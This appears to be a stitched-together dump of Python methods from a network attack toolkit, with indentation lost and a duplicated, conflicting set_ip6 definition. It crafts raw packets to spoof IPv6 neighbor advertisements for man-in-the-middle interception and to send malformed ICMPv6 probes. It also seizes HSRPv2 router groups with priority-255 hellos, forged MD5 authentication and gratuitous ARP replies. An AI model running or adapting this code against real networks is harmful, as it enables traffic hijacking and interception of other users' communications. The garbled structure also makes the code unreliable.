def invalid_option(self):
echo6 = dpkt.icmp6.ICMP6.Echo(id=1234,
seq=56789,
data="ABCDEFGHIJKLMNOPQRSTUVWXYZ")
icmp6 = dpkt.icmp6.ICMP6(type=dpkt.icmp6.ICMP6_ECHO_REQUEST,
code=0,
data=echo6)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(self.ip6_ll),
dst=dumbnet.ip6_aton("ff02::1"),
nxt=dpkt.ip.IP_PROTO_HOPOPTS,
hlim=1,
data=icmp6,
plen=len(icmp6_str))
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
rand = "".join([chr(random.randint(0x00, 0xff)) for i in xrange(13)])
hopopt = dpkt.ip6.IP6HopOptsHeader(nxt=dpkt.ip.IP_PROTO_ICMP6,
len=1,
data=struct.pack("!B13s", 1, rand))
ip6.extension_hdrs[dpkt.ip.IP_PROTO_HOPOPTS] = hopopt
ip6.plen = ip6.plen + len(str(hopopt))
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
len(icmp6_str), dpkt.ip.IP_PROTO_ICMP6)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(dst=dumbnet.eth_aton("33:33:00:00:00:01"),
src=self.mac,
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
self.dumbnet.send(str(eth))
def scan(self):
echo6 = dpkt.icmp6.ICMP6.Echo(id=1234,
seq=56789,
data="ABCDEFGHIJKLMNOPQRSTUVWXYZ")
icmp6 = dpkt.icmp6.ICMP6(type=dpkt.icmp6.ICMP6_ECHO_REQUEST,
code=0,
data=echo6)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(self.ip6_ll),
dst=dumbnet.ip6_aton("ff02::1"),
nxt=dpkt.ip.IP_PROTO_ICMP6,
hlim=64,
data=icmp6,
plen=len(icmp6_str))
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst, ip6.plen,
ip6.nxt)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(src=self.mac,
dst=dumbnet.eth_aton("33:33:00:00:00:01"),
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
self.dumbnet.send(str(eth))
def invalid_header(self):
echo6 = dpkt.icmp6.ICMP6.Echo(id=1234,
seq=56789,
data="ABCDEFGHIJKLMNOPQRSTUVWXYZ")
icmp6 = dpkt.icmp6.ICMP6(type=dpkt.icmp6.ICMP6_ECHO_REQUEST,
code=0,
data=echo6)
icmp6_str = str(icmp6)
rand = "".join([chr(random.randint(0x00, 0xff)) for i in xrange(14)])
data_str = struct.pack("!BB14s", dpkt.ip.IP_PROTO_ICMP6, 1,
rand) + icmp6_str
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(self.ip6_ll),
dst=dumbnet.ip6_aton("ff02::1"),
nxt=159,
hlim=64,
plen=len(data_str))
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
len(icmp6_str), dpkt.ip.IP_PROTO_ICMP6)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
icmp6_str = str(icmp6)
data_str = struct.pack("!BB14s", dpkt.ip.IP_PROTO_ICMP6, 1,
rand) + icmp6_str
ip6.data = data_str
eth = dpkt.ethernet.Ethernet(src=self.mac,
dst=dumbnet.eth_aton("33:33:00:00:00:01"),
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
self.dumbnet.send(str(eth))
def update_devices(self):
self.devices = {}
devs = pcap.findalldevs()
for (name, descr, addr, flags) in devs:
try:
test = dumbnet.eth(name)
mac = test.get()
self.devices[name] = {
'mac': mac,
'ip4': [],
'ip6': [],
'descr': descr,
'flags': flags
}
except:
pass
else:
if len(addr) > 1:
for (ip, mask, net, gw) in addr:
try:
dumbnet.ip_aton(ip)
addr_dict = {}
addr_dict['ip'] = ip
addr_dict['mask'] = mask
addr_dict['net'] = net
addr_dict['gw'] = gw
self.devices[name]['ip4'].append(addr_dict)
except:
pass
try:
dumbnet.ip6_aton(ip)
addr_dict = {}
addr_dict['ip'] = ip
if PLATFORM == "Windows" and mask is None:
addr_dict['mask'] = "ffff:ffff:ffff:ffff::"
else:
addr_dict['mask'] = mask
addr_dict['net'] = net
addr_dict['gw'] = gw
if ip.startswith("fe80:"):
addr_dict['linklocal'] = True
else:
addr_dict['linklocal'] = False
self.devices[name]['ip6'].append(addr_dict)
except:
pass
else:
#????
pass
def on_release_button_clicked(self, btn):
select = self.treeview.get_selection()
(model, paths) = select.get_selected_rows()
for i in paths:
iter = model.get_iter(i)
try:
peer = dumbnet.ip_aton(model.get_value(iter, self.STORE_SRC_ROW))
except:
peer = dumbnet.ip6_aton(model.get_value(iter, self.STORE_SRC_ROW))
(iter, pkg, run, arp) = self.peers[peer]
self.peers[peer] = (iter, pkg, False, arp)
model.set_value(iter, self.STORE_STATE_ROW, "Released")
def on_get_button_clicked(self, btn):
select = self.treeview.get_selection()
(model, paths) = select.get_selected_rows()
for i in paths:
iter = model.get_iter(i)
try:
peer = dumbnet.ip_aton(model.get_value(iter, self.STORE_SRC_ROW))
except:
peer = dumbnet.ip6_aton(model.get_value(iter, self.STORE_SRC_ROW))
(iter, pkg, run, arp) = self.peers[peer]
if self.arp_checkbutton.get_active():
arp = 3
else:
arp = 0
self.peers[peer] = (iter, pkg, True, arp)
model.set_value(iter, self.STORE_STATE_ROW, "Taken")
if not self.thread.is_alive():
self.thread.start()
def add_spoof(self):
data = []
org_data = []
hosts = []
for host_upper in self.upper_add:
(ip_upper, rand_mac_upper, iter_upper) = self.upper_add[host_upper]
for host_lower in self.lower_add:
(ip_lower, rand_mac_lower,
iter_lower) = self.lower_add[host_lower]
advert = struct.pack("!I16sBB6s", 0x60000000,
dumbnet.ip6_aton(ip_upper), 2, 1,
dumbnet.eth_aton(rand_mac_upper))
icmp6 = dpkt.icmp6.ICMP6(type=dpkt.icmp6.ND_NEIGHBOR_ADVERT,
code=0,
data=advert)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(ip_upper),
dst=dumbnet.ip6_aton(ip_lower),
nxt=dpkt.ip.IP_PROTO_ICMP6,
hlim=255,
data=icmp6,
plen=len(icmp6_str))
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
ip6.plen, ip6.nxt)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(
dst=dumbnet.eth_aton(host_lower),
src=dumbnet.eth_aton(rand_mac_upper),
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
data.append(str(eth))
advert = struct.pack("!I16sBB6s", 0x60000000,
dumbnet.ip6_aton(ip_lower), 2, 1,
dumbnet.eth_aton(host_upper))
icmp6 = dpkt.icmp6.ICMP6(type=dpkt.icmp6.ND_NEIGHBOR_ADVERT,
code=0,
data=advert)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(ip_upper),
dst=dumbnet.ip6_aton(ip_lower),
nxt=dpkt.ip.IP_PROTO_ICMP6,
hlim=255,
data=icmp6,
plen=len(icmp6_str))
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
ip6.plen, ip6.nxt)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(dst=dumbnet.eth_aton(host_lower),
src=dumbnet.eth_aton(host_upper),
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
org_data.append(str(eth))
advert = struct.pack("!I16sBB6s", 0x60000000,
dumbnet.ip6_aton(ip_lower), 2, 1,
dumbnet.eth_aton(rand_mac_lower))
icmp6 = dpkt.icmp6.ICMP6(type=dpkt.icmp6.ND_NEIGHBOR_ADVERT,
code=0,
data=advert)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(ip_lower),
dst=dumbnet.ip6_aton(ip_upper),
nxt=dpkt.ip.IP_PROTO_ICMP6,
hlim=255,
data=icmp6,
plen=len(icmp6_str))
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
ip6.plen, ip6.nxt)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(
dst=dumbnet.eth_aton(host_upper),
src=dumbnet.eth_aton(rand_mac_lower),
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
data.append(str(eth))
advert = struct.pack("!I16sBB6s", 0x60000000,
dumbnet.ip6_aton(ip_lower), 2, 1,
dumbnet.eth_aton(host_lower))
icmp6 = dpkt.icmp6.ICMP6(type=dpkt.icmp6.ND_NEIGHBOR_ADVERT,
code=0,
data=advert)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(ip_lower),
dst=dumbnet.ip6_aton(ip_upper),
nxt=dpkt.ip.IP_PROTO_ICMP6,
hlim=255,
data=icmp6,
plen=len(icmp6_str))
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
ip6.plen, ip6.nxt)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(dst=dumbnet.eth_aton(host_upper),
src=dumbnet.eth_aton(host_lower),
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
org_data.append(str(eth))
hosts.append(host_upper)
mld = struct.pack(
"!xxHBBH16s", 1, 4, 0, 0,
dumbnet.ip6_aton("ff02::1:ff00:0000")[:13] +
dumbnet.ip6_aton(ip_upper)[13:])
icmp6 = dpkt.icmp6.ICMP6(type=143, code=0, data=mld)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(ip_upper),
dst=dumbnet.ip6_aton("ff02::16"),
nxt=dpkt.ip.IP_PROTO_HOPOPTS,
hlim=1,
data=icmp6,
plen=len(icmp6_str) + 8)
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6.extension_hdrs[
dpkt.ip.IP_PROTO_HOPOPTS] = dpkt.ip6.IP6HopOptsHeader(
nxt=dpkt.ip.IP_PROTO_ICMP6,
data=struct.pack("!BBHBB", 5, 2, 0, 1, 0))
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
len(icmp6_str), dpkt.ip.IP_PROTO_ICMP6)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(
dst=dumbnet.eth_aton("33:33:00:00:00:16"),
src=self.mac,
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
self.dumbnet.send(str(eth))
self.log("ICMP6: Joined multicast group " + dumbnet.ip6_ntoa(
dumbnet.ip6_aton("ff02::1:ff00:0000")[:13] +
dumbnet.ip6_aton(ip_upper)[13:]))
for host_lower in self.lower_add:
hosts.append(host_lower)
(ip_lower, rand_mac_lower, iter_lower) = self.lower_add[host_lower]
mld = struct.pack(
"!xxHBBH16s", 1, 4, 0, 0,
dumbnet.ip6_aton("ff02::1:ff00:0000")[:13] +
dumbnet.ip6_aton(ip_lower)[13:])
icmp6 = dpkt.icmp6.ICMP6(type=143, code=0, data=mld)
icmp6_str = str(icmp6)
ip6 = dpkt.ip6.IP6(src=dumbnet.ip6_aton(ip_lower),
dst=dumbnet.ip6_aton("ff02::16"),
nxt=dpkt.ip.IP_PROTO_HOPOPTS,
hlim=1,
data=icmp6,
plen=len(icmp6_str) + 8)
ip6.extension_hdrs = {}
for i in dpkt.ip6.ext_hdrs:
ip6.extension_hdrs[i] = None
ip6.extension_hdrs[
dpkt.ip.IP_PROTO_HOPOPTS] = dpkt.ip6.IP6HopOptsHeader(
nxt=dpkt.ip.IP_PROTO_ICMP6,
data=struct.pack("!BBHBB", 5, 2, 0, 1, 0))
ip6_pseudo = struct.pack('!16s16sIxxxB', ip6.src, ip6.dst,
len(icmp6_str), dpkt.ip.IP_PROTO_ICMP6)
icmp6.sum = ichecksum_func(ip6_pseudo + icmp6_str)
eth = dpkt.ethernet.Ethernet(
dst=dumbnet.eth_aton("33:33:00:00:00:16"),
src=self.mac,
data=str(ip6),
type=dpkt.ethernet.ETH_TYPE_IP6)
self.dumbnet.send(str(eth))
self.log("ICMP6: Joined multicast group " + dumbnet.ip6_ntoa(
dumbnet.ip6_aton("ff02::1:ff00:0000")[:13] +
dumbnet.ip6_aton(ip_lower)[13:]))
self.upper_add = {}
self.lower_add = {}
return (data, org_data, hosts)
def input_ip6(self, eth, ip6, timestamp):
if eth.src == self.mac:
return
if ip6.nxt == dpkt.ip.IP_PROTO_ICMP6:
icmp6 = dpkt.icmp6.ICMP6(str(ip6.data))
mac = dumbnet.eth_ntoa(str(eth.src))
if self.mac:
if icmp6.type == dpkt.icmp6.ND_NEIGHBOR_SOLICIT:
ip6_dst = dumbnet.ip6_ntoa(str(icmp6.data)[4:20])
for h in self.hosts:
if mac == h:
(ip6_src, rand_mac_src, iter_src,
reply_src) = self.hosts[mac]
for i in self.hosts:
(ip6, rand_mac_dst, iter_dst,
reply_dst) = self.hosts[i]
if ip6_dst == ip6:
break
if reply_src and reply_dst:
_icmp6 = dpkt.icmp6.ICMP6(
type=dpkt.icmp6.ND_NEIGHBOR_SOLICIT,
code=0,
data=struct.pack("!L16sBB6s", 0x60000000,
dumbnet.ip6_aton(ip6_dst),
1, 1, rand_mac_dst))
_eth = dpkt.ethernet.Ethernet(
dst=eth.src,
src=dumbnet.eth_aton(rand_mac_dst),
type=dpkt.ip.IP_PROTO_IP6,
data=str(_icmp6))
self.dumbnet.send(str(_eth))
break
if icmp6.type == dpkt.icmp6.ND_ROUTER_ADVERT:
if mac in self.hosts:
(ip, random_mac, iter, reply) = self.hosts[mac]
if self.ui == 'gtk':
self.hosts_liststore.set(iter, 2, "R")
for h in self.hosts:
if mac == h:
return
(ip, random_mac, iter, reply) = self.hosts[h]
if mac == random_mac:
return
ip = dumbnet.ip6_ntoa(ip6.src)
if ip == "::":
return
rand_mac = [
0x00,
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)
]
rand_mac = ':'.join(map(lambda x: "%02x" % x, rand_mac))
if self.ui == 'gtk':
iter = self.hosts_liststore.append(
[mac, ip, "", self.mac_to_vendor(mac)])
elif self.ui == 'urw':
self.hostlist.append(
self.parent.menu_button(
"%s(%s) - %s" % (mac, self.mac_to_vendor(mac), ip),
self.urw_hostlist_activated, mac))
iter = None
self.hosts[mac] = (dumbnet.ip6_ntoa(ip6.src), rand_mac, iter,
False)
if self.ui == 'gtk':
self.mappings_liststore.append([mac, rand_mac])
def set_ip6(self, ip, mask, ip_ll, mask_ll):
self.ip = dumbnet.ip6_aton(ip)
self.ip6_ll = ip_ll
self.mask6_ll = mask_ll
def set_ip6(self, ip6, mask6, ip6_ll, mask6_ll):
self.ip6 = dumbnet.ip6_aton(ip6)
self.mask6 = len(IPy.IP(mask6).strBin().replace("0", ""))
self.ip6_ll = dumbnet.ip6_aton(ip6_ll)
self.mask6_ll = len(IPy.IP(mask6_ll).strBin().replace("0", ""))
def run(self):
self.parent.log("HSRP2: Thread started")
while self.running:
for i in self.parent.peers:
(iter, pkg, state, arp) = self.parent.peers[i]
if state:
hsrp2_group_state = hsrp2_group_state_tlv( hsrp2_group_state_tlv.OP_CODE_HELLO,
hsrp2_group_state_tlv.STATE_ACTIVE,
pkg["hsrp2_group_state_tlv"].ip_ver,
pkg["hsrp2_group_state_tlv"].group,
self.parent.mac,
255,
pkg["hsrp2_group_state_tlv"].hello_time,
pkg["hsrp2_group_state_tlv"].hold_time,
pkg["hsrp2_group_state_tlv"].ip
)
data = hsrp2_group_state.render()
if "hsrp2_text_auth_tlv" in pkg:
hsrp2_text_auth = hsrp2_text_auth_tlv(pkg["hsrp2_text_auth_tlv"].auth_data)
data += hsrp2_text_auth.render()
elif "hsrp2_md5_auth_tlv" in pkg:
if pkg["hsrp2_group_state_tlv"].ip_ver == 4:
ip = self.parent.ip
else:
ip = self.parent.ip6_ll[0] + self.parent.ip6_ll[-3:]
auth = hsrp2_md5_auth_tlv(pkg["hsrp2_md5_auth_tlv"].algo, pkg["hsrp2_md5_auth_tlv"].flags, ip, pkg["hsrp2_md5_auth_tlv"].keyid, "\x00" * 16)
if self.parent.ui == 'gtk':
secret = self.parent.auth_entry.get_text()
elif self.parent.ui == 'urw':
secret = self.parent.auth_edit.get_edit_text()
key_length = struct.pack("<Q", (len(secret) << 3))
key_fill = secret + '\x80' + '\x00' * (55 - len(secret)) + key_length
salt = data + auth.render()
m = hashlib.md5()
m.update(key_fill)
m.update(salt)
m.update(secret)
auth.csum = m.digest()
data += auth.render()
pass
if pkg["hsrp2_group_state_tlv"].ip_ver == 4:
udp_hdr = dpkt.udp.UDP( sport=HSRP2_PORT,
dport=HSRP2_PORT,
data=data
)
udp_hdr.ulen += len(udp_hdr.data)
ip_hdr = dpkt.ip.IP( ttl=1,
p=dpkt.ip.IP_PROTO_UDP,
src=self.parent.ip,
dst=dumbnet.ip_aton(HSRP2_MULTICAST_ADDRESS),
data=str(udp_hdr)
)
ip_hdr.len += len(ip_hdr.data)
ipt = dpkt.ethernet.ETH_TYPE_IP
else:
udp_hdr = dpkt.udp.UDP( sport=HSRP2_PORT6,
dport=HSRP2_PORT6,
data=data
)
udp_hdr.ulen += len(udp_hdr.data)
ip_hdr = dpkt.ip6.IP6( hlim=255,
nxt=dpkt.ip.IP_PROTO_UDP,
src=self.parent.ip6_ll,
dst=dumbnet.ip6_aton(HSRP2_MULTICAST6_ADDRESS),
data=udp_hdr,
plen = len(str(udp_hdr))
)
ip_hdr.extension_hdrs = { 0 : None,
43 : None,
44 : None,
51 : None,
50 : None,
60 : None
}
ipt = dpkt.ethernet.ETH_TYPE_IP6
eth_hdr = dpkt.ethernet.Ethernet( dst=dumbnet.eth_aton(HSRP2_MULTICAST_MAC),
src=self.parent.mac,
type=ipt,
data=str(ip_hdr)
)
self.parent.dumbnet.send(str(eth_hdr))
if arp:
src_mac = dumbnet.eth_aton("00:00:0c:9f:f0:%02x" % (pkg["hsrp2_group_state_tlv"].group))
brdc_mac = dumbnet.eth_aton("ff:ff:ff:ff:ff:ff")
stp_uplf_mac = dumbnet.eth_aton("01:00:0c:cd:cd:cd")
ip = pkg["hsrp2_group_state_tlv"].ip
arp_hdr = dpkt.arp.ARP( hrd=dpkt.arp.ARP_HRD_ETH,
pro=dpkt.arp.ARP_PRO_IP,
op=dpkt.arp.ARP_OP_REPLY,
sha=src_mac,
spa=ip,
tha=brdc_mac,
tpa=ip
)
eth_hdr = dpkt.ethernet.Ethernet( dst=brdc_mac,
src=src_mac,
type=dpkt.ethernet.ETH_TYPE_ARP,
data=str(arp_hdr)
)
self.parent.dumbnet.send(str(eth_hdr))
arp_hdr = dpkt.arp.ARP( hrd=dpkt.arp.ARP_HRD_ETH,
pro=dpkt.arp.ARP_PRO_IP,
op=dpkt.arp.ARP_OP_REPLY,
sha=src_mac,
spa=ip,
tha=stp_uplf_mac,
tpa=ip
)
eth_hdr = dpkt.ethernet.Ethernet( dst=stp_uplf_mac,
src=src_mac,
type=dpkt.ethernet.ETH_TYPE_ARP,
data=str(arp_hdr)
)
self.parent.dumbnet.send(str(eth_hdr))
self.parent.peers[i] = (iter, pkg, state, arp - 1)
time.sleep(1)
self.parent.log("HSRP2: Thread terminated")